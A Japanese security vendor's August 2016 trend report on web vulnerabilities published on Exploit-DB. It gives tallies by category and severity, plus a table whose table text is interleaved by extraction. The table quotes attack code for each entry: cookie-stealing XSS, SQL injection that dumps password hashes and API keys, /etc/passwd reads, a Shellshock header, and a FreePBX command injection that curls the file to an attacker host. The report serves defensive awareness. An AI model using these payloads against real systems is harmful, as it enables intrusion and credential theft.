2016.08 EDB-Report 最新Web脆弱性トレンドレポート(2016.08) 2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 2016年8月に公開されたExploit-DBの分析結果、Cross Site Scriptingの攻撃に対する脆弱性報告件数が最も多かったです。発見されたCross Site Scriptingらの攻撃は単にスクリプトを使用したり、イメージタグを使用す るなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした 。しかし、Cross Site Scriptingの攻撃は、スクリプトおよび特定タグが実行されると、脆弱な部分に実際の多様なコードが挿入ができる攻撃 なので、スクリプトおよびタグなどの実行自体ができないようにしなければなりません。したがって、脆弱性が発見された該当ソフトウェアを使用する管理者はそのスクリプトおよびイメージタグが実行されるかを確認した後、必ずセキュアコー ディングおよびアップデートが必要と考えられます。Cross Site Scripting以外の脆弱性では、Linux Bashの脆弱性としてよく知られているShellShockの脆弱性が発見されました。攻撃パターンは、主にHTTP Headerに入り、 CGIが実行される際、任意の命令語が実行されることができます。2014年に初めて発見されたShellShockの脆弱性は、OpenSSLの脆弱性であるHeartBleed脆弱性よりもっと波及力が大きな脆弱性でしたが、現在はBash Updateを最新に実施して、解決することができます。古いバージョンのLinuxを使用している管理者であればこのようなセキュリティアップデートを実施し、ShellShockと同じ脆弱性に露出されて、規模の大きいセキュリティ事故とつなが らないように注意しなければなりません。 14 1. 脆弱性別件数 脆弱性カテゴリ ファイルアップロード (File Upload) リモートコマンド実行 (Remote Command Execution) ディレクトリトラバーサル (Directory Traversal) ローカルファイル挿入 (Local File Inclusion:LFI) コマンド インジェクション (Command Injection) SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 脆弱性別件数 件数 12 1 12 2 10 10 2 8 4 6 5 5 4 4 10 2 12 36 2 2 Remote Command Execution Directory Traversal 1 0 File Upload LFI Command Injection SQL Injection XSS 危険度別件数 2. 危険度別件数 危険度 早急対応要 高 合計 件数 割合 3 33 36 8% 92% 100% 3 早急対応要 高 33 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 中 易 合計 3 12 32 49 6% 24% 65% 100% 攻撃実行の難易度別件数 3 12 難 中 易 32 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 WSO2 Carbon Nagios Network Analyzer Wordpress Sakai Nagios Incident Manager NUUO NVRmini FreePBX Navis WebAccess Nagios Log Server PHP Power Browse chatNow phpCollab CMS Davolink Subrion CMS Zabbix WebNMS Framework Server 合計 件数 7 5 5 4 2 2 2 1 1 1 1 1 1 1 1 1 36 主なソフトウェア別脆弱性発生件数 WSO2 Carbon 1 1 1 1 Nagios Network Analyzer 7 Wordpress 1 1 Sakai 1 Nagios Incident Manager 1 NUUO NVRmini FreePBX 2 5 Navis WebAccess Nagios Log Server 2 PHP Power Browse 2 chatNow 4 5 phpCollab CMS Davolink EDB-Report 最新Web脆弱性トレンドレポート(2016.08) 2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-08-01 2016-08-01 EDB番号 40190 40189 脆弱性カテゴリ XSS SQL Injection 攻撃難脆弱性度 中 難 危険度 高 早急対応要 脆弱性名 攻撃コード 対象プログラム 対象環境 Wordpress WordPress WP Live Chat Support Plugin 6.2.03 Wordpress WordPress Booking Calendar Plugin 6.2 Wordpress WordPress Count per Day Plugin 3.5.4 Davolink Davolink DV2051 PHP Power Browse PHP Power Browse 1.2 Subrion CMS Subrion CMS 4.0.5 POST /wp-admin/admin-ajax.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 WordPress WP Live Chat Support Plugin 6.2.03 - adminajax.php XSS 脆弱性 action=wplc_user_send_offline_message&security=8d1f c19e30&cid=1&name=<script>eval(String.fromCharCod e(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fro mCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script> WordPress Booking Calendar Plugin 6.2 - SQL Injection POST /wp-admin/admin.php?page=booking%2Fwpdevbooking.phpwpdevbooking&wh_approved&wh_is_new=1&wh_booking_d ate=3&view_mode=vm_listing HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 wh_booking_id=3 AND (SELECT 5283 FROM(SELECT COUNT(*),CONCAT(0x7176626271,(SELECT MID((IFNULL(CAST(user_pass AS CHAR),0x20)),1,54) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 2016-08-05 40206 XSS 中 高 2016-08-05 40205 XSS 易 高 2016-08-05 40204 LFI 易 高 2016-08-05 40202 SQL Injection 易 高 GET / HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 WordPress Count per Day Plugin Referer: 3.5.4 - / XSS 脆弱性 javascript:c=String.fromCharCode;alert(c(83)+c(117)+c( 109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110) +c(108)) /scvrtsrv.cmd?action=add&srvName=FooBar<iframe%2 Davolink DV-2051 - / XSS 脆弱性 0onload=alert(0)>&srvAddr=192.168.1.100&proto=1,& eStart=4444,&eEnd=4444,iStart=4444,&iEnd=4444, PHP Power Browse 1.2 browse.php LFI 脆弱性 Subrion CMS 4.0.5 /admin/database/sql/ SQL Injection 脆弱性 /browse.php?p=source&file=/etc/passwd POST /admin/database/sql/ HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 query=1 and 1=1--&show_query=1 or 1=1-&exec_query=Go Copyright 2016 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2016.08) 2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 POST / HTTP/1.1 Host: User-Agent: () { :;}; /bin/ls -al 2016-08-06 40213 Remote Command Execution 難 早急対応要 NUUO NVRmini 2 3.0.8 - /cgibin/cgi_system RCE 脆弱性 Accept: */* Content-Type: application/x-www-form-urlencoded; NUUO NVRmini charset=UTF-8 NUUO NVRmini 2 3.0.8 cmd=ftp_setup&act=modify&com_port=21&pasv_port_fr om=1024&pasv_port_to=65535&services=enable 2016-08-06 40212 Command Injection 易 高 NUUO NVRmini 2 3.0.8 - /cgibin/cgi_system Command Injection 脆弱性 POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 NUUO NVRmini NUUO NVRmini 2 3.0.8 phpCollab CMS phpCollab CMS 2.5 bfolder=%2Fmtd%2Fblock3&bfile=|ping%20n%200%20localhost&inc_emap=no&inc_pos=no 2016-08-08 2016-08-08 40218 40216 SQL Injection SQL Injection 易 易 高 phpCollab CMS 2.5 /phpcollab/users/emailusers.php?id=1%20or%201=1-emailusers.php SQL Injection 脆 &&PHPSESSID=ghtu76jt276nji04lua07930t5 弱性 高 /express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT Navis WebAccess UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(10 showNotice.do SQL Injection 脆 6)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE Navis WebAccess Navis WebAcces 弱性 WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR( 113)||CHR(62))) FROM DUAL) 2016-08-10 40229 Directory Traversal 易 高 2016-08-15 40237 SQL Injection 易 高 2016-08-16 40241 XSS 易 高 POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 WebNMS Framework Server 5.2 AppleWebKit/535.7 KHTML, like Gecko and 5.2 SP1 - /servlets/ Directory Chrome/16.0.912.75 Safari/535.7 Traversal 脆弱性 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 WebNMS Framework Server WebNMS Framework Server 5.2 and 5.2 SP1 /latest.php?output=ajax&sid=&favobj=toggle&toggle_o Zabbix 2.2.x, 3.0.x - latest.php pen_state=1&toggle_ids[]=15385)%3B%20select%20 SQL Injection 脆弱性 *%20from%20users%20where%20(1%3D1 Zabbix Zabbix 2.2.x, 3.0.x /carbon/identity-mgt/challengesWSO2 Carbon 4.4.5 mgt.jsp?addRowId=XSS&setName="/><script>alert(docu challenges-mgt.jsp XSS 脆弱性 ment.cookie)</script> WSO2 Carbon WSO2 Carbon 4.4.5 Copyright 2016 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2016.08) 2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 2016-08-16 40240 LFI 易 高 脆弱性名 40252 Command Injection 中 高 /nagiosim/reports/download/ Command Injection 脆弱性 2016-08-16 40251 SQL Injection 中 高 対象プログラム 対象環境 WSO2 Carbon WSO2 Carbon 4.4.5 yMDE2LTA1LTA2JmVuZF9kYXRlPTIwMTYtMDUtMDYmdHl Nagios Incident Nagios Incident wZXNbXT0yIiIiO3t0b3VjaCwvdG1wL01ZRklMRX07ZWNob Manager Manager 2.0.0 WSO2 Carbon 4.4.5 /carbon/log-view/downloadgzdownloadgz-ajaxprocessor.jsp ajaxprocessor.jsp?logFile=../../repository/conf/registry.x LFI 脆弱性 ml&tenantDomain=&serviceName= Nagios Incident Manager 2.0.0 2016-08-16 攻撃コード /nagiosim/reports/download/jpg/mttr/c3RhcnRfZGF0ZT0 w== /nagiosna/index.php/api/checks/read?q%5Blastcode%5 Nagios Network Analyzer 2.2.0 D=0&o%5Bcol%5D=name%20AND%20(SELECT%20* Nagios Network /nagiosna/index.php/api/checks %20FROM%20(SELECT(SLEEP(5)))UtTW)&o%5Bsort% Analyzer / SQL Injection 脆弱性 5D=ASC Nagios Network Analyzer 2.2.0 POST /nagioslogserver/api/check/create/1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; 2016-08-16 40250 Command Injection 中 高 Nagios Log Server 1.4.1 - charset=UTF-8 Nagios Log Nagios Log Server Server 1.4.1 Nagios Incident Manager Nagios Incident Manager 2.0.0 Nagios Network Analyzer 2.2.0 - /nagiosna/index.php/api/sources/read?o%5Bcol%5D=n Nagios Network /nagiosna/index.php/api/source ame%20AND%20(SELECT%20*%20FROM%20(SELEC Analyzer s/ SQL Injection 脆弱性 # T(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC Nagios Network Analyzer 2.2.0 Multiple Vulnerabilities alert={"name"%3a"StduserAlertTest","check_interval"%3a" 1m","lookback_period"%3a"1m","warning"%3a"1","critical" %3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/to uch", "args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created _by"%3a"stduser","query_id"%3a"AVTLGmdGYGKrkWMo5Tc"} 2016-08-16 40252 SQL Injection 難 早急対応要 2016-08-16 40251 SQL Injection 中 高 POST /nagiosim/admin/settings HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; Nagios Incident Manager 2.0.0 charset=UTF-8 /nagiosim/admin/settings SQL Injection 脆弱性 timezone=Pacific/Samoa' AND (SELECT 5323 FROM(SELECT COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST (DATABASE() AS CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ' Copyright 2016 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2016.08) 2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-08-16 EDB番号 40251 脆弱性カテゴリ SQL Injection 攻撃難脆弱性度 中 危険度 高 脆弱性名 40251 Command Injection 中 高 /nagiosna/index.php/download/r eport/sourcegroup/ Command Injection 脆弱性 Nagios Network Analyzer 2.2.0 2016-08-16 40251 Command Injection 中 高 /nagiosna/index.php/download/r eport/source/ Command Injection 脆弱性 2016-08-16 2016-08-16 40241 40241 XSS XSS 易 易 高 高 対象プログラム POST /nagiosna/index.php/admin/globals HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; Nagios Network Analyzer 2.2.0 charset=UTF-8 Nagios Network /nagiosna/index.php/admin/ Analyzer SQL Injection 脆弱性 # timezone=US/Eastern%' AND (SELECT 4646 FROM(SELECT COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT 0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='' Nagios Network Analyzer 2.2.0 2016-08-16 攻撃コード /nagiosna/index.php/download/report/sourcegroup/test/ cVtyaWRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1R FU1RGSUxFfTtlY2hvICI= /nagiosna/index.php/download/report/source/test/cVtya WRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1RFU1R GSUxFfTtlY2hvICI= /carbon/identity-mgt/challenges-mgtfinish.jsp?setName=%22%2F%3E%3Cscript%3Ealert %28document.cookie%29%3C%2Fscript%3E&questio n0=&question1=City+where+you+were+born+%3F&set Id1=http%3A%2F%2Fwso2.org%2Fclaims%2Fchallen geQuestion1&question1=City+where+you+were+born+ %3F&question2=Father%27s+middle+name+%3F&setI d2=http%3A%2F%2Fwso2.org%2Fclaims%2Fchalleng eQuestion1&question2=Father%27s+middle+name+% 3F&question3=Name+of+your+first+pet+%3F&setId3= http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQu estion2&question3=Name+of+your+first+pet+%3F&qu estion4=Favorite+sport+%3F&setId4=http%3A%2F%2 WSO2 Carbon 4.4.5 Fwso2.org%2Fclaims%2FchallengeQuestion2&question challenges-mgt-finish.jsp XSS 脆 4=Favorite+sport+%3F&question5=Favorite+food+%3F 弱性 # &setId5=http%3A%2F%2Fwso2.org%2Fclaims%2Fcha llengeQuestion1&question5=Favorite+food+%3F&quest ion6=Favorite+vacation+location+%3F&setId6=http%3 A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1 &question6=Favorite+vacation+location+%3F&question 7=Model+of+your+first+car+%3F&setId7=http%3A%2 F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&que stion7=Model+of+your+first+car+%3F&question8=Na me+of+the+hospital+where+you+were+born+%3F&set Id8=http%3A%2F%2Fwso2.org%2Fclaims%2Fchallen geQuestion2&question8=Name+of+the+hospital+wher e+you+were+born+%3F&setId9=%22%2F%3E%3Cscr ipt%3Ealert%28document.cookie%29%3C%2Fscript %3E&question9=XSS WSO2 Carbon 4.4.5 webapp_info.jsp XSS 脆弱性 /carbon/webapplist/webapp_info.jsp?webappFileName=odata.war&web appState=all&hostName=victimserver&httpPort=9763&defaultHostName=victimserver&webappType=%22/%3E%3Cscript%3Ealert%2 8%27XSS%20hyp3rlinx%20\\n\\n%27%20%2bd ocument.cookie%29%3C/script%3E 対象環境 Nagios Network Analyzer 2.2.0 Nagios Network Nagios Network Analyzer Analyzer 2.2.0 Nagios Network Nagios Network Analyzer Analyzer 2.2.0 WSO2 Carbon WSO2 Carbon 4.4.5 WSO2 Carbon WSO2 Carbon 4.4.5 /carbon/ndatasource/newdatasource.jsp?dsName=%22o 2016-08-16 40241 XSS 易 高 WSO2 Carbon 4.4.5 newdatasource.jsp XSS 脆弱性 nMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx% 20\\n\\n%27%2bdocument.cookie%29&edit=HELL Copyright 2016 Penta Security Systems Inc. All rights reserved WSO2 Carbon WSO2 Carbon 4.4.5 EDB-Report 最新Web脆弱性トレンドレポート(2016.08) 2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 WSO2 Carbon WSO2 Carbon 4.4.5 WSO2 Carbon WSO2 Carbon 4.4.5 Wordpress WordPress 4.5.3 Sakai Sakai 10.7 Sakai Sakai 10.7 Sakai Sakai 10.7 2016-08-16 40241 XSS 易 高 WSO2 Carbon 4.4.5 validateconnectionajaxprocessor.jsp 脆弱性 /carbon/ndatasource/validateconnectionajaxprocessor.jsp?&dsName=WSO2_CARBON_DB&drive r=com.mysql.jdbc.Driver&url=%22/%3E%3Cscript%3E alert%28666%29%3C/script%3E&username=root&dsT ype=RDBMS&customDsType=RDBMS&dsProviderType= default&dsclassname=undefined&dsclassname=undefin ed&dsproviderProperties=undefined&editMode=false&c hangePassword=true&newPassword= 2016-08-16 40241 XSS 易 高 WSO2 Carbon 4.4.5 handlers.jsp XSS 脆弱性 /carbon/viewflows/handlers.jsp?retainlastbc=true&flow =in&phase=%22/%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C/script%3E POST /wp-admin/admin-ajax.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko WordPress 4.5.3 - admin2016-08-22 40288 Directory Traversal 易 高 Chrome/16.0.912.75 Safari/535.7 ajax.php Directory Traversal 脆弱 Accept: */* 性 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 plugin=../../../../../../../../../../dev/random&action=updateplugin 2016-08-22 40286 File Upload 中 高 POST /sakai-fckconnector/web/editor/filemanager/browser/default/con nectors/jsp/connector/user/admin/?Command=FileUplo ad&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioA dmin%2F HTTP/1.1 Host: Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Sakai 10.7 - / File Upload 脆弱性 Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="file"; filename="test.jsp'-alert(1)-'foo" Content-Type: application/octet-stream test -----------------------------7dd10029908f2-- Sakai 10.7 2016-08-22 40286 XSS 易 高 /portal/tool/~admin-1010/ XSS 脆弱性 2016-08-22 40286 XSS 易 高 /portal/tool/~admin1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A _id10=Data+Warehouse+Update&_id2:_id14=Post&com. sun.faces.VIEW=&_id2=_id2 Sakai 10.7 /access/basiclti/site/~admin/axxm4j<img src=a /access/basiclti/site/~admin/ XSS onerror=alert(3)> 脆弱性 Copyright 2016 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2016.08) 2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 2016-08-22 40286 LFI 易 高 脆弱性名 攻撃コード /portal/tool/41fec34b-a47c-4aa5-8786Sakai 10.7 - /portal/tool/ LFI 脆 3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB弱性 INF/web.xml 対象プログラム 対象環境 Sakai Sakai 10.7 chatNow chatNow Wordpress WordPress Mail Masta Plugin 1. 2016-08-23 40293 XSS 易 高 POST /chatNow/login.php/95fb4"><script>alert(45)</script>b 5ca1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 chatNow - login.php XSS 脆弱性 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 2016-08-23 40290 LFI 易 高 WordPress Mail Masta Plugin /wp-content/plugins/mail1.0 - count_of_send.php LFI 脆 masta/inc/campaign/count_of_send.php?pl=/etc/passw 弱性 d 2016-08-29 40296 Remote Command Execution 中 高 FreePBX 13.0.35 - config.php RCE 脆弱性 /admin/config.php?display=modules&action=upload&d ownload=0x4148&remotemod=http://127.0.0.1/junk% 26x=$(cat /etc/passwd);curl -d "$x" http://Attacker_server:8080/0x4148.jnk FreePBX FreePBX 13.0.35 2016-08-29 40312 SQL Injection 中 高 FreePBX 13.0.35 - config.php SQL Injection 脆弱性 /admin/config.php?display=f4ris"XOR(if(6661=6661,sle ep(0.03),0))OR"*/ FreePBX FreePBX 13.0.35 Copyright 2016 Penta Security Systems Inc. All rights reserved
© Copyright 2024 ExpyDoc